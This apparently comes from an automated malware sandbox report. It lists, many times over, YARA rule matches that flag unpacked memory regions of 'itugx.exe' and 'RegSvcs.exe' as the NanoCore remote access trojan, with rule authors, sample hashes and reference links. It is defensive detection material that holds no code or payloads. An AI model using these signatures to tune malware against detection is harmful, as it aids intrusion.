      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
